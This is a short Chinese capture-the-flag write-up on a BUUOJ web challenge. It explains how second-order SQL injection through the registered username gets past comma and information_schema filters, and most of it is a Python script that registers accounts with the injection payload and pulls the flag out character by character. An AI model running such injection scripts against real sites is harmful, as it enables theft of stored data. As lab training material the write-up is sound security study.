注冊用了郵箱、賬戶名、密碼,登錄只用了郵箱和密碼,登錄進去后賬戶名顯示出來了,推測存在二次注入
過濾了逗號和information,無法使用information_schema,猜測flag在flag表中
上腳本
#coding:utf-8
import requests
from bs4 import BeautifulSoup
import time
url = 'http://2a3b6044-d59f-4a4f-ba8c-8c06a64cc813.node3.buuoj.cn/'
m = ''
for i in range(100):
payload = "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i+1)
register = {'email':'abc{}@qq.com'.format(i),'username':payload,'password':'123456'}
login = {'email':'abc{}@qq.com'.format(i),'password':'123456'}
req = requests.session()
r1 = req.post(url+'register.php',data = register)
r2 = req.post(url+'login.php', data = login)
r3 = req.post(url+'index.php')
html = r3.text
soup = BeautifulSoup(html,'html.parser')
UserName = soup.span.string.strip()
if int(UserName) == 0:
break
m += chr(int(UserName))
print(m)
time.sleep(1)
payload左右加0是為了防止報錯
